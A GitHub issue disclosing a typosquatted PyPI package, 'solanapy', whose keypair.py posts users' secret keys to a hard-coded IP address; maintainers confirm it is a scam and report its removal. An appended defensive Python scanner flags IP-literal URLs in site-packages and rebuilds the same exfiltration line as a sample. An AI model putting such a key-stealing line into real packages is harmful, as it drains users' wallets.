Typo-squatting attack targeting solana-py users

$ python3 -m venv .
$ . bin/activate
$ pip3 install solanapy
$ grep -nHr api.php lib
Binary file lib/python3.8/site-packages/solana/__pycache__/keypair.cpython-38.pyc matches
lib/python3.8/site-packages/solana/keypair.py:85:        requests.post('http://80.78.25.59/api.php', data={"keypair": str(secret_key), "package":"solanapy"})

This isn’t yours, is it? https://pypi.org/project/solanapy/ (Genuine PyPI page is https://pypi.org/project/solana/)

Probably related: https://twitter.com/pypi/status/1562442188285308929

Issue Analytics

  • State: closed
  • Created a year ago
  • Comments: 5

Top GitHub Comments

5 reactions
kevinheavey commented, Aug 25, 2022

Thanks for raising this. To be clear to anyone reading, the genuine PyPI package “solana” is unaffected and there’s been no security breach. But this scam package is very bad and we have contacted PyPI to get it taken down asap.

2 reactions
kevinheavey commented, Aug 31, 2022

The malicious package has been removed from PyPI.
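
The grep in the issue found the leak by searching for one known string. As an added example (not code from the issue or from solana-py), the script below generalizes that check: it scans a site-packages tree for URLs whose host is a bare IP address and names the installed distribution whose RECORD lists the file. The sample tree, the `0.0.0` version and all function names are constructed for illustration.

```python
import ipaddress
import re
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")

def ip_literal_urls(text):
    """Yield (line_number, url) for every URL whose host is a bare IP address."""
    for lineno, line in enumerate(text.splitlines(), 1):
        for url in URL_RE.findall(line):
            try:
                ipaddress.ip_address(urlsplit(url).hostname or "")
            except ValueError:
                continue  # DNS name or unparsable URL: not an IP literal
            yield lineno, url

def owning_distributions(site_packages, rel_path):
    """Distributions whose RECORD lists rel_path (assumes paths without commas)."""
    return [rec.parent.name.split("-")[0]
            for rec in sorted(Path(site_packages).glob("*.dist-info/RECORD"))
            if rel_path in {row.split(",")[0] for row in rec.read_text().splitlines()}]

def scan(site_packages):
    """Yield (relative path, line, url, owners) for each IP-literal URL in .py files."""
    root = Path(site_packages)
    for path in sorted(root.rglob("*.py")):
        rel = path.relative_to(root).as_posix()
        for lineno, url in ip_literal_urls(path.read_text(errors="replace")):
            yield rel, lineno, url, owning_distributions(root, rel)

def build_sample(root):
    """Constructed stand-in for the tree in the issue; version 0.0.0 is a placeholder."""
    pkg, info = Path(root, "solana"), Path(root, "solanapy-0.0.0.dist-info")
    pkg.mkdir()
    info.mkdir()
    leak = "requests.post('http://80.78.25.59/api.php', data={'keypair': str(secret_key)})"
    (pkg / "keypair.py").write_text("\n" * 84 + "        " + leak + "\n")
    (pkg / "rpc.py").write_text("URL = 'https://api.example.org/v1'\n")
    (info / "RECORD").write_text("solana/keypair.py,,\nsolana/rpc.py,,\n")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, lineno, url, owners in scan(build_sample(tmp)):
            print(f"{rel}:{lineno}: {url} (installed by: {', '.join(owners) or 'unknown'})")
```

Pointed at a real environment, `scan()` will also list legitimate loopback or test addresses, so treat each hit as a lead to read. A file under `solana/` owned by a distribution other than `solana` is the mismatch this issue describes.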
